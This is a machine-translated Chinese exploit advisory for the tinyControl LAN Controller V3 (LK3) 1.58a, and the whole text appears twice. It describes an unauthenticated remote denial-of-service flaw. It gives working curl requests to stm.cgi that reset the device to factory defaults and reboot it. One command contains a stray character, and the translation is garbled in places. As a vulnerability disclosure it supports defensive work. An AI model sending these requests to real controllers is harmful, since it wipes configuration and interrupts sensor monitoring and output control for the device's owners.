利用标题: TinyControl LAN控制器V3(LK3)1.58A-远程拒绝服务
利用作者:液态虫
vendor: tinyControl
产品网页: https://www.tinycontrol.pl
受影响的版本:=1.58a,HW 3.8
摘要: LAN控制器是一个非常通用的
允许您连接许多不同的设备
传感器并远程查看他们的读数,并且
远程控制各种类型的输出。
也可以结合两个功能
进入自动if-这是带日历的
何时- 然后。该设备提供用户界面
以网页的形式。网站礼物
读取各种类型的传感器:温度,
湿度,压力,电压,电流。也是如此
允许您配置设备,包括。事件
设置和控制多达10个输出。谢谢
为了支持许多协议,可能
从智能手机运营,收集和观察
服务器上的结果以及合作
使用基于TCP/IP和Modbus的其他I/O系统。
DESC:控制器遭受了未经身份验证的
远程拒绝服务漏洞。攻击者
可以向Stm.CGI页面发出直接请求到
重新启动并在设备上重置出厂设置。
在: LWIP上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5785
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5785.php
18.08.2023
- -
$ curl 3http://192.168.1.1:8082/stm.cgi?eeprom_reset=1#还原默认设置
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1#重新启动控制器
利用作者:液态虫
vendor: tinyControl
产品网页: https://www.tinycontrol.pl
受影响的版本:=1.58a,HW 3.8
摘要: LAN控制器是一个非常通用的
允许您连接许多不同的设备
传感器并远程查看他们的读数,并且
远程控制各种类型的输出。
也可以结合两个功能
进入自动if-这是带日历的
何时- 然后。该设备提供用户界面
以网页的形式。网站礼物
读取各种类型的传感器:温度,
湿度,压力,电压,电流。也是如此
允许您配置设备,包括。事件
设置和控制多达10个输出。谢谢
为了支持许多协议,可能
从智能手机运营,收集和观察
服务器上的结果以及合作
使用基于TCP/IP和Modbus的其他I/O系统。
DESC:控制器遭受了未经身份验证的
远程拒绝服务漏洞。攻击者
可以向Stm.CGI页面发出直接请求到
重新启动并在设备上重置出厂设置。
在: LWIP上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5785
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5785.php
18.08.2023
- -
$ curl 3http://192.168.1.1:8082/stm.cgi?eeprom_reset=1#还原默认设置
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1#重新启动控制器